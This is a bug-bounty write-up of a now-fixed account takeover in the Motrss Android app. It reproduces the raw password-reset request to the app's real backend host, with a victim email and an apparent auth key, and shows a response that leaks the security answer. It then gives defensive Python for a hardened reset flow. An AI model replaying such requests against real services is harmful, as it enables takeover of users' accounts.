Hi guys, here is one of my simple write-ups on a Motrss account takeover. So basically Motrss is your one-stop solution for all automobile services. In just a few clicks, book your next vehicle servicing, repairing and maintenance service appointment.
So it's an Android app, and there is an endpoint where some sensitive information was disclosed. Using that information, an attacker could take over any user account.
The issue was in the reset password functionality.
So here is the password reset request:
POST /GetUserSecurityQuestion
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: motrss.ap-south-1.elasticbeanstalk.com
Connection: close
User-Agent: Apache-HttpClient/UNVAILABLE (java 1.4)
user_id=victim@site.com&YEK_HTUA_SW=etyewt5788fjdfh
And here is the response:
HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GTM
Server: Apache
Content-Length : 116
Connect: close
Content-Type: text/html; charset-UTF-8
{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}
So here in the response the answer to the security question is reflected back to the client. The server is checking nothing: it hands the secret that is supposed to prove the user's identity to whoever knows the victim's email, so the "security question" step provides no protection at all.
Now just use that answer, create a new password and log in.
So here is the video proof of concept.
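As an added illustration (this is not the Motrss code, which the write-up does not show), here is how a reset flow avoids this class of leak: the question endpoint returns only the question, the answer is stored hashed and compared server-side in constant time, wrong guesses are limited, and a correct answer yields a short-lived, single-use reset token instead of letting the client decide. The user store, salt, limits and response shape are constructed assumptions; `leaks_sensitive_fields` is a small audit check that flags the kind of key the vulnerable response above exposed.

```python
import hashlib
import hmac
import json
import secrets
import time

# Keys that should never appear in a response body sent to a client.
# Constructed list; extend it for the API under review.
SENSITIVE_KEYS = {"answer", "password", "otp", "token", "secret"}


def leaks_sensitive_fields(body):
    """Return the set of sensitive key names found anywhere in a JSON body.

    `body` may be a JSON string or an already-parsed object. Useful as a
    response-audit check in tests or a proxy: the write-up's response
    would return {"answer"}.
    """
    found = set()

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key.lower() in SENSITIVE_KEYS:
                    found.add(key.lower())
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(json.loads(body) if isinstance(body, str) else body)
    return found


def _hash_answer(answer, salt):
    # Normalise case and whitespace so "google" and " Google " match,
    # then derive a slow hash; the plaintext answer is never stored.
    normalized = " ".join(answer.strip().lower().split())
    return hashlib.pbkdf2_hmac("sha256", normalized.encode("utf-8"), salt, 100_000)


# Constructed in-memory user store (assumption: the real app uses a database).
_SALT = secrets.token_bytes(16)
USERS = {
    "victim@site.com": {
        "id": "7",
        "question": "What is your dream Job?",
        "salt": _SALT,
        "answer_hash": _hash_answer("Google", _SALT),
        "failed_attempts": 0,
    }
}
MAX_ATTEMPTS = 5          # lock the question after this many wrong guesses
TOKEN_TTL_SECONDS = 600   # reset token validity window
RESET_TOKENS = {}         # token -> (user_id, expiry timestamp)


def get_security_question(user_id):
    """Hardened replacement for /GetUserSecurityQuestion: question only."""
    user = USERS.get(user_id)
    if user is None:
        return {"status": "Failure", "Data": []}
    return {"status": "Success",
            "Data": [{"id": user["id"], "questions": user["question"]}]}


def verify_security_answer(user_id, answer):
    """Check the answer server-side; return a reset token on success, else None."""
    user = USERS.get(user_id)
    if user is None or user["failed_attempts"] >= MAX_ATTEMPTS:
        return None
    supplied = _hash_answer(answer, user["salt"])
    # Constant-time comparison so timing does not leak how close a guess was.
    if not hmac.compare_digest(user["answer_hash"], supplied):
        user["failed_attempts"] += 1
        return None
    user["failed_attempts"] = 0
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token] = (user_id, time.time() + TOKEN_TTL_SECONDS)
    return token


def reset_password(token, new_password):
    """Consume a reset token once; reject unknown or expired tokens."""
    entry = RESET_TOKENS.pop(token, None)
    if entry is None:
        return False
    user_id, expiry = entry
    if time.time() > expiry:
        return False
    user = USERS[user_id]
    user["password_hash"] = hashlib.pbkdf2_hmac(
        "sha256", new_password.encode("utf-8"), user["salt"], 100_000)
    return True
```

The important change is that the client never sees anything it could use to answer the question itself; the only thing it receives after a correct answer is an opaque token that expires and is invalidated on first use. Running `leaks_sensitive_fields` over every JSON response in an API test suite is a cheap way to catch a field like `answer` slipping into a response before it reaches production.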
Status: Fixed
Bounty Rewarded